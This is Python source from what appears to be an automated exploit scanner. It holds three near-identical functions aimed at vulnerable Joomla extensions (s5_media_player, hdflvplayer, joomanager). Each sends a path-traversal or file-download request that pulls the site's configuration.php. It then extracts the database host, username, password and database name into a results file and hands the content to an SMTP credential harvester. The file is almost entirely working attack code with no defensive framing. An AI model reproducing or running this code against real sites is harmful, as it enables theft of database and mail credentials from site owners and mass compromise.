def Exploit(site):
try:
Exp = 'http://' + site + \
'/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
GetConfig = requests.get(Exp, timeout=10, headers=Headers)
if 'JConfig' in str(GetConfig.content):
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
Getuser = re.findall("user = '******';", str(GetConfig.content))
Getpass = re.findall("password = '******';",
str(GetConfig.content))
Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] +
'\n---------------------\n')
getSMTP.GETSmtpJoomConf(str(GetConfig.content))
except:
return printModule.returnYes(site, 'N/A',
'Com_s5_media_player', 'Joomla')
return printModule.returnYes(site, 'N/A', 'Com_s5_media_player',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_s5_media_player',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_s5_media_player',
'Joomla')
def Exploit(site):
try:
Exp = 'http://' + site + \
'/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
GetConfig = requests.get(Exp, timeout=5, headers=Headers)
if 'JConfig' in str(GetConfig.content):
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
Getuser = re.findall("user = '******';", str(GetConfig.content))
Getpass = re.findall("password = '******';",
str(GetConfig.content))
Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] +
'\n---------------------\n')
getSMTP.GETSmtpJoomConf(str(GetConfig.content))
except:
return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer',
'Joomla')
return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
def Exploit(site):
try:
Exp = 'http://' + site + \
'/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
GetConfig = requests.get(Exp, timeout=10, headers=Headers)
if 'JConfig' in str(GetConfig.content):
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
Getuser = re.findall("user = '******';", str(GetConfig.content))
Getpass = re.findall("password = '******';",
str(GetConfig.content))
Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: '******'\n' + ' pass: '******'\n' + ' DB: ' + Getdb[0] +
'\n---------------------\n')
getSMTP.GETSmtpJoomConf(str(GetConfig.content))
except:
return printModule.returnYes(site, 'N/A', 'Com_Joomanager',
'Joomla')
return printModule.returnYes(site, 'N/A', 'Com_Joomanager',
'Joomla')
else:
return printModule.returnNo(site, 'N/A', 'Com_Joomanager',
'Joomla')
except:
return printModule.returnNo(site, 'N/A', 'Com_Joomanager', 'Joomla')